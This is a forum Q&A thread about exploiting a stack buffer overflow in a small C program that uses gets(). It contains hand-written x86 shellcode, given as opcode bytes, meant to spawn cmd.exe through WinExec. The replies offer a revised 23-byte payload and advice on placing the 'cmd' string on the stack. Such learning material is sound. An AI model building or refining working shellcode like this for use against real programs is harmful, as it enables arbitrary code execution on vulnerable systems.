# Stack buffer overflow exploit stacking characters?

Tags: exploit, exploit-development

I have a program like this:

```
int main() {  
   char buffer[16];
   printf("Write something: ");
   gets(buffer);
   printf("You wrote: %s\n", buffer);
   return 0; 
}
```

And I have wrote a little bytecode payload, that should launch cmd.exe via WinExec,

```
ADD ESP -80      ; 83 C4 80, at 0x0019FF28
XOR EDX, EDX     ; 31 D2   
PUSH EDX         ; 52
PUSH 'd'         ; 6A 64
PUSH 'm'         ; 6A 6D
PUSH 'c'         ; 6A 63    
PUSH  1          ; 6A 01
NOP              ; 90
CALL F0 F7 77 74 ; E8 F0 F7 77 74 = WinExec (0x7477F7F0) 
28 FF 19         ; 28 FF 19 <-- this should be a new return address
```

So it will fail to execute the code, which is wrong. Any idea how to tweak the code or any idea what should I incorporate into code? And I am not sure whether pushing characters onto stack is also valid.
(And yes, it's only a demonstration)

Answer (score 1):

This is what I've came up with:

```
63 6D 64       ; "cmd"  <-- 0x19FF28
20             ; \0x14
31 C0          ; XOR EAX, EAX <-- 0x19FF2C
8D 1C E4       ; LEA EBX, [ESP]
88 43 03       ; MOV BYTE PTR DS:[EBX+4], AL
40             ; INC EAX
53             ; PUSH EBX
50             ; PUSH EAX (inc)
E8 74 77 F7 F0 ; CALL 74 77 F7 F0 
19 FF 2C       ; jump back to 0x19FF2C
```

Takes up 23 bytes, however it needs a tweak on address, where it jumps.

Answer (score 0):

It looks like you are calling `WinExec('d', 'm', 'c', 1)`, since you push each character seperately on the stack.

Instead, you need to push a pointer to the stack that points to `cmd\0`. In other words, you push the address of the `c` in `cmd\0`, where `\0` is the null-byte.

Comment: Hmm, but that would require to add another 10B, which I have no room for, because I have only 20B on stack and 3B for the return address, where it should jump.

Comment: Maybe you can put your string literal after the return address.

Comment: If I think about it, I don't really need the first instruction at all, right? I am not popping from stack anything, so I could trim three bytes there.